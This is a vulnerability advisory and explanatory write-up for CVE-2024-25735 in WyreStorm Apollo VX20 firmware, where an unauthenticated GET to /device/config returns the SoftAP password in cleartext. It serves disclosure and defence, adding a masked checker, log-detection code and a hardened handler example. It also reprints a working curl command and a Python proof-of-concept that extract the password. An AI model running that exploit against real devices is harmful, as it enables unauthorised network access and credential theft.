Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.wyrestorm.com
[Product]
APOLLO VX20 < 1.3.58
[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)
[Affected Component]
Web interface, config
[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58
[CVE Reference]
CVE-2024-25735
[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) router by sending an unauthenticated HTTP GET request to /device/config.
The credentials are returned in the HTTP response:
curl -k https://192.168.x.x/device/config
E.g. HTTP response snippet:
:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...
[Exploit/POC]
import requests

target = "https://x.x.x.x"   # device address

# Unauthenticated GET; verify=False disables certificate checks, like curl -k above
res = requests.get(target + "/device/config", verify=False)
body = res.text  # decoded text; res.content is bytes in Python 3 and .find() of a str fails

idx = body.find('{"password":')
if idx != -1:
    # the "router" key follows the password inside the softAp object
    idx2 = body.find('router', idx)
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + body[idx + 1:idx2 + 11])   # "password":"...","router":"y"
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo VX20 Device not vulnerable...")
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx CVE-2024-25735: WyreStorm Apollo VX20 < 1.3.58 – Incorrect Access Control & Credentials Disclosure
Security researcher John Page (aka hyp3rlinx) disclosed a high-severity vulnerability in the WyreStorm Apollo VX20, affecting firmware versions prior to 1.3.58. The flaw, tracked as CVE-2024-25735, returns the device's SoftAP password in cleartext in response to an unauthenticated HTTP GET request to its configuration endpoint. The root cause is missing access control: the endpoint serves sensitive configuration to any remote client without checking who is asking.
Technical Overview of the Vulnerability
The vulnerability lies in the web interface's /device/config endpoint, which is reachable over HTTPS without authentication. A single HTTP GET to this endpoint returns a JSON document with the device configuration, including the SoftAP password in plain text:
curl -k https://192.168.x.x/device/config
Example response snippet:
{"softAp":{"password":"12345678","router":"y","softAp":"y"}}
The password value is returned verbatim to an unauthenticated caller: it is neither withheld nor masked in the read-back, and the HTTPS transport does nothing to help, because the attacker is the legitimate peer of that TLS session. For a device that hosts its own Wi-Fi access point, that is a failure of a basic control.
Exploitation and Proof of Concept
Security researcher John Page (aka hyp3rlinx) demonstrated the exploit using a simple Python script. This script automates the detection of vulnerable devices and extracts credentials.
```python
import requests

target = "https://x.x.x.x"   # device address

# Unauthenticated GET; verify=False disables certificate checks, like curl -k above
res = requests.get(target + "/device/config", verify=False)
body = res.text  # decoded text; res.content is bytes in Python 3 and .find() of a str fails

idx = body.find('{"password":')
if idx != -1:
    # the "router" key follows the password inside the softAp object
    idx2 = body.find('router', idx)
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + body[idx + 1:idx2 + 11])   # "password":"...","router":"y"
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo VX20 Device not vulnerable...")
```
Explanation: the script issues one unauthenticated GET to /device/config with verify=False, which disables TLS certificate verification (the same thing curl -k does in the command above). It then searches the response text for the literal {"password": and, if found, uses the router key that follows it as the end delimiter, printing the "password":"…","router":"y" fragment that confirms the disclosure. The response body must be handled as text: in Python 3, requests' res.content is bytes, and calling .find() on it with a str argument raises TypeError, so use res.text (or decode the bytes). The substring approach also depends on key order inside the JSON; parsing the body as JSON is more robust.
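A more robust checker, added here as an example and not part of the advisory or the researcher's script: it parses the body as JSON, finds the softAp object wherever it sits in the document, and reports only a masked password so a scan report never stores the cleartext. The function names and the sample bodies are this example's own, and the sample bodies are constructed from the snippet above rather than captured from a device.

```python
"""Added example (not part of the original advisory): check a device for
CVE-2024-25735 by parsing the JSON response rather than substring-searching
it, and report only a masked password. Function names are this example's own."""
import json
import ssl
import urllib.request
from typing import Any, Optional


def mask(secret: str) -> str:
    """Keep only the length and the last two characters, so scan output
    never stores the full SoftAP password."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return "*" * (len(secret) - 2) + secret[-2:]


def find_softap_password(body: str) -> Optional[str]:
    """Return the cleartext SoftAP password if the body carries one, else None.
    The whole document is walked, so the check does not depend on where the
    softAp object sits or on key order."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return None

    def walk(node: Any) -> Optional[str]:
        if isinstance(node, dict):
            soft = node.get("softAp")
            if isinstance(soft, dict) and isinstance(soft.get("password"), str):
                return soft["password"]
            children = node.values()
        elif isinstance(node, list):
            children = node
        else:
            return None
        for child in children:
            hit = walk(child)
            if hit is not None:
                return hit
        return None

    return walk(doc)


def assess(body: str) -> dict:
    """Summarise one /device/config body for a scan report."""
    pw = find_softap_password(body)
    if not pw:
        return {"vulnerable": False, "password_masked": None}
    return {"vulnerable": True, "password_masked": mask(pw), "password_length": len(pw)}


def fetch_config(base_url: str, timeout: float = 5.0) -> str:
    """Unauthenticated GET of /device/config. Certificate verification is
    disabled on purpose, mirroring `curl -k` in the advisory."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = base_url.rstrip("/") + "/device/config"
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample bodies modelled on the advisory's snippet; not real captures.
SAMPLE_VULNERABLE = (
    '{"screen":"dual","ipconflict":"y",'
    '"wifi":{"auto":"y","band":"5","channel":"153"},'
    '"softAp":{"password":"12345678","router":"y","softAp":"y"}}'
)
SAMPLE_FIXED = '{"screen":"dual","softAp":{"router":"y","softAp":"y"}}'

if __name__ == "__main__":
    import sys
    body = fetch_config(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_VULNERABLE
    print(assess(body))
```

Run it with the device URL as the only argument to test a live device, or with no argument to see the result on the constructed sample. A device on fixed firmware is expected to either refuse the request or omit the password; both cases come back as not vulnerable.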
Why This Is a High-Severity Issue
| Factor | Impact |
|---|---|
| Remote Access | Attackers can exploit from anywhere on the network, even without being physically near the device. |
| Authentication Bypass | No login or session required—credentials are exposed in plain text. |
| Cleartext Credentials | Full password is readable, enabling immediate compromise of the SoftAP network. |
| Network Exposure | The Apollo VX20 is a networked device that also hosts its own Wi-Fi access point, so its SoftAP credential is worth more than a single login. |
Even behind a perimeter firewall, anyone with a foothold on the local network (a rogue Wi-Fi client, a compromised IoT device) can fetch the password, join the SoftAP and sit as a peer of the clients that use it. That is the starting position for man-in-the-middle attacks against those clients and for further lateral movement.
Vendor Response and Timeline
The vulnerability was reported to WyreStorm on January 18, 2024. The vendor released a fixed firmware update v1.3.58 on February 2, 2024, addressing the access control flaw. Public disclosure occurred on February 11, 2024, ensuring transparency and enabling users to patch their devices.
Recommendations for Users and Organizations
- Update Firmware Immediately: All Apollo VX20 devices running firmware before 1.3.58 should be updated to v1.3.58 or later.
- Rotate the SoftAP Password: Patching closes the endpoint but does not invalidate a password that was already read out of it; change it after updating, and do not reuse it elsewhere.
- Restrict Access to the Web Interface: If the device does not need to be reachable from other networks, limit the web interface to a management VLAN or address range with firewall rules.
- Monitor for Unauthorized Access: Watch HTTP logs from proxies, IDS or network sensors for GET requests to /device/config from unexpected sources, and treat a 200 response to such a request as a likely disclosure.
- Use Strong Passwords: The example response shows an eight-digit numeric password; choose a long, unique SoftAP passphrase so that a leak from one device does not unlock anything else.
- Regular Security Audits: Routinely check IoT and AV devices for configuration endpoints that answer without authentication.
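Detection logic for the monitoring item above, added as an example that is not part of the advisory. It assumes combined-format HTTP access logs from a reverse proxy, IDS or network sensor in front of the device (the advisory says nothing about what logging the device itself keeps), and an assumed management subnet passed as trusted_networks; the log lines are constructed, not captured, and the names are this example's own.

```python
"""Added example (not from the advisory): flag GET /device/config requests in
HTTP access logs. Assumes combined-format logs from a reverse proxy, IDS or
network sensor in front of the device; trusted_networks is an assumed
management subnet list. Names are this example's own."""
import ipaddress
import re
from typing import Iterable, List, Optional

# Combined log format; the referrer/user-agent pair at the end is optional.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "[^"]*" "(?P<ua>[^"]*)")?'
)

SENSITIVE_PATHS = {"/device/config"}


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields, or None if it is not one."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: Iterable[str], trusted_networks: Iterable[str]) -> List[dict]:
    """Return one alert per request for a sensitive path.
    high:   served (2xx) to a source outside the trusted networks
    medium: served (2xx) to a trusted source (still worth reviewing)
    low:    refused (any other status), i.e. a probe against a patched device"""
    nets = [ipaddress.ip_network(n, strict=False) for n in trusted_networks]
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # ignore query string
        if rec["method"] != "GET" or path not in SENSITIVE_PATHS:
            continue
        try:
            src = ipaddress.ip_address(rec["src"])
        except ValueError:
            continue
        trusted = any(src in n for n in nets)
        if rec["status"].startswith("2"):
            severity = "medium" if trusted else "high"
        else:
            severity = "low"
        alerts.append({
            "severity": severity, "src": rec["src"], "ts": rec["ts"],
            "status": rec["status"], "ua": rec["ua"] or "", "path": path,
        })
    return alerts


# Constructed sample lines; not a real capture.
SAMPLE_LOG = [
    '10.0.5.23 - - [11/Feb/2024:09:14:02 +0000] "GET /device/config HTTP/1.1" 200 1842 "-" "curl/8.4.0"',
    '10.0.5.23 - - [11/Feb/2024:09:14:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.1.7 - - [11/Feb/2024:09:20:44 +0000] "GET /device/config?x=1 HTTP/1.1" 200 1842 "-" "python-requests/2.31.0"',
    '192.168.50.9 - - [11/Feb/2024:10:02:11 +0000] "GET /device/config HTTP/1.1" 401 0 "-" "curl/8.4.0"',
    'not an access log line',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG, ["10.0.1.0/24"]):
        print(alert)
```

The status code matters: a 200 to an untrusted source means the password has most likely already left the device and should trigger the rotation step, while a 401 only says someone probed a patched unit. The query string is stripped before matching so that `/device/config?x=1` is not missed.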
Expert Insight: Lessons from CVE-2024-25735
This vulnerability serves as a stark reminder that access control is not optional—even in internal or local network devices. Many manufacturers assume that "internal" devices are inherently safe, but this is a dangerous misconception. The absence of authentication on a configuration endpoint is a red flag for security professionals.
As IoT devices proliferate, the attack surface expands. The Apollo VX20 case highlights how a single oversight—exposing configuration data in plain text—can enable full compromise. This is not just a technical flaw; it's a design flaw rooted in poor security hygiene.
For developers and vendors: assume every endpoint is reachable by an adversary and require authentication (session cookies or signed tokens such as JWTs) before serving configuration, with rate limiting so that credential guessing and scanning are slowed down. Do not return stored secrets in configuration read-backs at all: report that a value is set, or show a masked form, and keep the cleartext on the device.
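To make that guidance concrete, here is an added example (not the vendor's code, and not from the advisory) of the unauthenticated handler pattern beside a hardened one that requires a session token and redacts secrets on read-back. It is framework-free: a request is a dict of headers and a handler returns a status code and a payload. The sample configuration, the session store and all names are this example's own; rate limiting is left out to keep the contrast focused on access control and redaction.

```python
"""Added example (not the vendor's code): the unauthenticated config
handler pattern the advisory describes, beside a hardened version that
requires a session token and redacts secrets on read-back. Names and the
sample config are this example's own."""
import hmac
import secrets
from typing import Any, Dict, Optional, Tuple

# Constructed configuration modelled on the advisory's response snippet.
DEVICE_CONFIG: Dict[str, Any] = {
    "screen": "dual",
    "wifi": {"auto": "y", "band": "5", "channel": "153"},
    "softAp": {"password": "12345678", "router": "y", "softAp": "y"},
}

SECRET_KEYS = {"password", "passphrase", "psk", "secret", "token"}
REDACTED = "********"


def config_handler_vulnerable(request: dict, config: dict) -> Tuple[int, Any]:
    """Pre-1.3.58 pattern: no identity check, whole config echoed to anyone."""
    return 200, config


def redact(node: Any) -> Any:
    """Replace string values under secret-looking keys at any depth."""
    if isinstance(node, dict):
        return {
            k: REDACTED if k.lower() in SECRET_KEYS and isinstance(v, str) else redact(v)
            for k, v in node.items()
        }
    if isinstance(node, list):
        return [redact(v) for v in node]
    return node


class SessionStore:
    """Opaque bearer tokens issued after login; compared in constant time."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def login(self, user: str) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[token] = user
        return token

    def user_for(self, presented: str) -> Optional[str]:
        presented_b = presented.encode("utf-8")
        for token, user in self._tokens.items():
            if hmac.compare_digest(token.encode("ascii"), presented_b):
                return user
        return None


def config_handler_hardened(request: dict, config: dict,
                            sessions: SessionStore) -> Tuple[int, Any]:
    """Deny unauthenticated callers, and never return stored secrets even to
    authenticated ones: read-back shows that a password is set, not its value."""
    auth = request.get("headers", {}).get("Authorization", "")
    scheme, _, token = auth.partition(" ")
    user = sessions.user_for(token) if scheme == "Bearer" and token else None
    if user is None:
        return 401, {"error": "authentication required"}
    return 200, redact(config)


if __name__ == "__main__":
    import json
    sessions = SessionStore()
    print("vulnerable, no auth:", json.dumps(config_handler_vulnerable({}, DEVICE_CONFIG)))
    print("hardened, no auth:  ", json.dumps(config_handler_hardened({"headers": {}}, DEVICE_CONFIG, sessions)))
    tok = sessions.login("admin")
    ok = {"headers": {"Authorization": "Bearer " + tok}}
    print("hardened, logged in:", json.dumps(config_handler_hardened(ok, DEVICE_CONFIG, sessions)))
```

Two design points: the token comparison uses hmac.compare_digest so a guessed token cannot be confirmed byte by byte through timing, and redaction is applied on every read, not just for anonymous callers. If an administrator UI genuinely needs to display the SoftAP passphrase, that should be a separate, explicitly audited action rather than a side effect of fetching the whole configuration.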
Conclusion
CVE-2024-25735 is a clear example of how incorrect access control leads directly to credential disclosure. The WyreStorm Apollo VX20 vulnerability, though fixed in firmware 1.3.58, underscores the importance of proactive security measures in embedded systems. Users should keep firmware current, rotate any credential that may already have been read out, and apply zero-trust principles even to devices that seem "safe" because they sit on an internal network.
Disclaimer: The information in this advisory is provided "as-is" with no warranties. Redistribution is permitted with proper credit to the author, hyp3rlinx. Unauthorized or malicious use of this information is prohibited.